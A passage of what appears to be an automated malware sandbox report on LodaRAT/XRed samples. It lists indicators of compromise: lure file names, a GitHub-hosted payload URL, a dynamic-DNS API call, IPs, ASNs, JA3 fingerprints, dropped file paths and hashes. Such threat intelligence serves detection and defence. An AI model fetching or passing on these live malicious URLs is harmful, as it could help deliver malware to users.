                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                172.111.138.100VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                  New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                    Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                      Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                        test.msiGet hashmaliciousLodaRATBrowse
                                                                                                          FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                              LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                  KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    69.42.215.252xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    docx.msiGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    222.msiGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    raw.githubusercontent.comSupplier.batGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.199.110.133
                                                                                                                    Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 185.199.111.133
                                                                                                                    NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.199.111.133
                                                                                                                    fxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.199.109.133
                                                                                                                    OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 185.199.108.133
                                                                                                                    8lOT1rXZp5.exeGet hashmaliciousRedLineBrowse
                                                                                                                    • 185.199.111.133
                                                                                                                    Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 185.199.108.133
                                                                                                                    YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.199.109.133
                                                                                                                    YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.199.110.133
                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                    • 185.199.110.133
                                                                                                                    freedns.afraid.orgxyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    docx.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    222.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    VOXILITYGBVKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    test.msiGet hashmaliciousLodaRATBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    JPS.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 172.111.138.100
                                                                                                                    AWKNET-LLCUSxyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    docx.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    222.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    FASTLYUSSupplier.batGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.199.110.133
                                                                                                                    Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 185.199.111.133
                                                                                                                    NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.199.111.133
                                                                                                                    https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.2.137
                                                                                                                    star.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                    • 167.83.165.108
                                                                                                                    EFT Payment_Transcript__Survitecgroup.htmlGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.2.137
                                                                                                                    installeasyassist.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.65.21
                                                                                                                    https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.htmlGet hashmaliciousUnknownBrowse
                                                                                                                    • 151.101.129.44
                                                                                                                    http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 151.101.194.137
                                                                                                                    fxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.199.109.133

                                                                                                                    JA3 Fingerprints

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    37f463bf4616ecd445d4a1937da06e19xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 185.199.108.133
                                                                                                                    • 142.250.185.78
                                                                                                                    • 142.250.185.225
                                                                                                                    valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 185.199.108.133
                                                                                                                    • 142.250.185.78
                                                                                                                    • 142.250.185.225
                                                                                                                    VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 185.199.108.133
                                                                                                                    • 142.250.185.78
                                                                                                                    • 142.250.185.225
                                                                                                                    New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 185.199.108.133
                                                                                                                    • 142.250.185.78
                                                                                                                    • 142.250.185.225
                                                                                                                    Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 185.199.108.133
                                                                                                                    • 142.250.185.78
                                                                                                                    • 142.250.185.225
                                                                                                                    Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 185.199.108.133
                                                                                                                    • 142.250.185.78
                                                                                                                    • 142.250.185.225
                                                                                                                    FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    • 185.199.108.133
                                                                                                                    • 142.250.185.78
                                                                                                                    • 142.250.185.225
                                                                                                                    docx.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 185.199.108.133
                                                                                                                    • 142.250.185.78
                                                                                                                    • 142.250.185.225
                                                                                                                    hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 185.199.108.133
                                                                                                                    • 142.250.185.78
                                                                                                                    • 142.250.185.225
                                                                                                                    222.msiGet hashmaliciousXRedBrowse
                                                                                                                    • 185.199.108.133
                                                                                                                    • 142.250.185.78
                                                                                                                    • 142.250.185.225

                                                                                                                    Dropped Files

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exeFGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                      C:\ProgramData\Synaptics\Synaptics.exeFGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                        C:\ProgramData\Synaptics\RCX8AC4.tmpFGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                          LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse

                                                                                                                            Created / dropped Files

                                                                                                                            C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                                            Download File
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):118
                                                                                                                            Entropy (8bit):3.5700810731231707
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                            MD5:573220372DA4ED487441611079B623CD
                                                                                                                            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                            Malicious:false
                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_d4be583835f61739e072b3b8de18c3e8e49b1d_455b7b6e_ac32c3f4-cab5-43a6-9615-c632fe96dfac\Report.wer

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):65536
                                                                                                                            Entropy (8bit):1.2164178111882016
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:C33jVpstQImL0jMNtDzJDzqjICB4HpO3NnzuiFjZ24IO8EKDzy:CZyKyjMNtJqjIy1zuiFjY4IO8zy
                                                                                                                            MD5:588CB7387FE2F45BF2355BECA0E49673
                                                                                                                            SHA1:79EBE2AE68BE85FDC2F88F758A45768A1810AD90
                                                                                                                            SHA-256:59B19EB56CC9A580E0BEDA9121792DB111E69A1C45AA9653950AD45588ED0DBB
                                                                                                                            SHA-512:CE5BBC2404C1C70A2C03D527C5B8869DA0BC39ABD440C78B6A749EDD5CB41D215B5A1E5A9A0004E815391A3165A991F1073FEA6E64318E9F8BEC896CF3F87903
                                                                                                                            Malicious:false
                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.9.3.3.8.5.7.8.3.7.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.9.3.5.7.2.6.5.8.7.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.3.2.c.3.f.4.-.c.a.b.5.-.4.3.a.6.-.9.6.1.5.-.c.6.3.2.f.e.9.6.d.f.a.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.7.3.d.0.3.4.-.0.b.0.3.-.4.1.6.9.-.b.d.a.f.-.2.6.0.7.1.5.a.c.4.b.f.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.7.0.-.0.0.0.1.-.0.0.1.4.-.7.3.7.7.-.1.1.4.5.a.8.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.e.2.f.4.7.6.0.1.f.c.a.d.6.2.1.8.3.9.3.7.5.6.7.2.1.0.b.5.0.6.2.b.0.7.5.0.f.a.7.0.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_e73781c637c020daee3de6ae263d2d0a91f2a4c_455b7b6e_45ed40bc-42cf-4daf-8550-2e064347b847\Report.wer

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):65536
                                                                                                                            Entropy (8bit):1.2162174403327204
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:EwjVpsTXQI40WbkODzJDzqjICB4HpO3NnzuiFjZ24IO8EKDzyy:lyUWWbkOJqjIy1zuiFjY4IO8zy
                                                                                                                            MD5:FDAAEC9E62D26888A0BC68098A09AF6C
                                                                                                                            SHA1:20F378890BD16AD189DB8A283C502C668C6E4F83
                                                                                                                            SHA-256:AB41DEB96A5E97CED6977009E8FC1184E8A750EF0D4C84FEFBF6AB2BAC34E554
                                                                                                                            SHA-512:D5CA902838F93910ECDA2C12CFDA7874A0C2CDE347E2C4952CE12EFC2F4F7CECAD8A81D9BAEE43C5E69A304614D10B7DBFABAE4B294E7697401D373285055AA9
                                                                                                                            Malicious:false
                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.9.3.6.0.2.4.6.9.5.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.9.3.6.0.9.0.3.2.0.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.e.d.4.0.b.c.-.4.2.c.f.-.4.d.a.f.-.8.5.5.0.-.2.e.0.6.4.3.4.7.b.8.4.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.2.6.0.d.8.8.-.d.2.8.7.-.4.f.4.0.-.b.6.c.8.-.6.2.1.6.7.4.8.8.0.7.c.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.7.0.-.0.0.0.1.-.0.0.1.4.-.7.3.7.7.-.1.1.4.5.a.8.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.e.2.f.4.7.6.0.1.f.c.a.d.6.2.1.8.3.9.3.7.5.6.7.2.1.0.b.5.0.6.2.b.0.7.5.0.f.a.7.0.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER987B.tmp.dmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 30 10:49:06 2024, 0x1205a4 type
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5907729
                                                                                                                            Entropy (8bit):2.176868127314428
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:fgfkfr2iPPYWL4MOaQrItwncec5pc2JNOk/PSp1:fgfkqinOaQ0x5bokw
                                                                                                                            MD5:B5DBAC4A8E5A713A7426F531BE84EC20
                                                                                                                            SHA1:76E0B3337B26F762FCE4F0536E164D109E52765A
                                                                                                                            SHA-256:284E6B24D7DA54BC1F0E65D8B287C95DC7E64CC9C1DFC19622512E01493C262C
                                                                                                                            SHA-512:E338410CE2A6CC40632D12745F844C745A65CDB9A4A44578930F97732FCC994455F153CD9FBE3077234B2A548DFB12979493C54E90C63542300428267F27BAC8
                                                                                                                            Malicious:false
                                                                                                                            Preview:MDMP..a..... ........zrg.............g..........$%...n.....................T.......8...........T............8....W....................................................................................................eJ......d.......GenuineIntel............T.......p...Uzrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE3F.tmp.WERInternalMetadata.xml

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):6308
                                                                                                                            Entropy (8bit):3.7207659448068617
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:R6l7wVeJKxc6ngPYiSjLCWpDO89bl0sf0P3m:R6lXJx6YYbjlnfr
                                                                                                                            MD5:3DD25F80BFCB5F0AAA3E13E86854C3EA
                                                                                                                            SHA1:1592D6D30011CE732E7520B964A09D95BB60B0CD
                                                                                                                            SHA-256:C9D7725CD2A0A7B7F27FE3729D2F3F24E80E58D6342BCC8FFEEC72C5B637CA5E
                                                                                                                            SHA-512:2328EC8B096683E1E25E1DE051390569FDC6D3B7DECA229A69395C644D6359248BC9CA75EFA07BB01AD2F2DB5E1EF2F5D45F8FC9AC327B3EDF639E867AB8E809
                                                                                                                            Malicious:false
                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.9.2.<./.P.i.

                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE9E.tmp.xml

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4572
                                                                                                                            Entropy (8bit):4.448455572048345
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:cvIwWl8zsQJg77aI9D7nsWpW8VYYYm8M4JFTFOP+q84/JZpd:uIjfWI7xF7V4JQNJZpd
                                                                                                                            MD5:6B19603ABF055D438BC32D64BFB93674
                                                                                                                            SHA1:B79806D791754D6AACB8595F3B8FC984C3B7012A
                                                                                                                            SHA-256:BF5AFB9425F893321B31C7562C64B0A45489088ACE4F361266C43F3791DDCD09
                                                                                                                            SHA-512:8F25F52A2581460288BEC961498CCC0D7CF49FAA36B02CA0F011F8E6F602D388CC4273A57BDEDB5C6C7856B67716F598F77209F7BDD1E6D87956175CCF49A308
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653871" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERECE4.tmp.dmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:Mini DuMP crash report, 14 streams, CheckSum 0x00000004, Mon Dec 30 10:49:20 2024, 0x1205a4 type
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):195028
                                                                                                                            Entropy (8bit):2.644474967466797
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:hDGsDs8UzAO8+oa1Q7zx/pULpA20HOCbACJTP0jmhcMyP3/01:HY8O8+z1qzx/pcP0ufkTQr/M1
                                                                                                                            MD5:74C6F6502CF622DD22CA68040D586FF7
                                                                                                                            SHA1:0CF83F3EBD085FF0A22168A675D11C05B3A18D31
                                                                                                                            SHA-256:85CFAF7CB4FD88526353ECD45FAA9E4A90779DEAD7653CD0C4EDD4C8318629B3
                                                                                                                            SHA-512:4EB3811563084A21EFD194C75046968399D6681A2A61CDCEFC6DACEC881888FFCAB46878C3D0A1C1EA380187209BAFB7DCAF6A393CADF8D42148118DA9CA2BC4
                                                                                                                            Malicious:false
                                                                                                                            Preview:MDMP..a..... ........zrg............4...........$%..<.......$....;..........T.......8...........T................l..........`,..........L...............................................................................eJ..............GenuineIntel............T.......p...Uzrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE3D.tmp.WERInternalMetadata.xml

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):6314
                                                                                                                            Entropy (8bit):3.698475605537434
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:R6l7wVeJKxw6eYirJkbCWpDG89bgEsfMAm:R6lXJN6eYGJk7g3fK
                                                                                                                            MD5:40F01E5A6C916FC1832C34C53751A98A
                                                                                                                            SHA1:498A604B69FEFC0BB2CAE2551E9451A2A6E571B6
                                                                                                                            SHA-256:C56205CB55EDF2AAB5311B51AE263F5B61440D9A7910A0820FB1D4F4908749B2
                                                                                                                            SHA-512:8866B68160BBEAE3681F588A707EF20EED6FEE21EC3B9A6399CF3BD26C513E2FEC138D41CFA49529B85459E5744A90122B971C8287806E133FE9763CAE09901A
                                                                                                                            Malicious:false
